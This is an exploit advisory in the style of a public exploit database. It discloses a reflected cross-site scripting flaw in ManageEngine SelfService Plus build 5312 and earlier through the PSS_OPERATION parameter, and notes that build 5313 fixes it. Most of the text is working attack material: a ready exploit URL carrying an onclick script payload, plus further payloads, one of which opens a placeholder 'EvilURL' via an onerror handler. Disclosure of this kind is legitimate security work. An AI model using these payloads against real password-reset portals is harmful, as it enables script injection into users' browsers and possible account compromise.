# Exploit Title: Reflected XSS in ManageEngine SelfService Plus - 0day - Confirmed 
# Google Dork: N/A
# Date: 29/5/2016
# Exploit Author: Mohamed Saeed
# Contact: http://twitter.com/krmalab
# Website: http://www.dts-solution.com
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: <= ManageEngine SelfService Plus build 5312 (Mar 2016).
# Tested on: Affected browser’s: All - Tested on FireFox 44.0.2 .
# CVE : N/A (ManageEngine Not in CVE-ID Covered Products)
# Category: webapps

Reflected XSS:
=============

GET URL : http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock

Vulnerable Parameter : PSS_OPERATION


Exploit: http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock<button/onclick=alert(1)>DTS<>/button>


Notes: 
=====

There is some filter mechanisim in place Not all XSS payload will work.


Other XSS Payloads :
==================
 0x00.  "><img src=x onerror=window.open('EvilURL');>
 0x01.  <p/onmouseover=javascript:alert(1);>DTS</p>

Refrences:
=========
0x00. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
0x01. https://www.owasp.org/index.php/XSS_Attacks


Solution:
========
Upgrade to latest version (build 5313)


About US:
=========
DTS Solution Research and Security labs provide latest security updates, research and development, tool-kits and whitepapers around cyber security.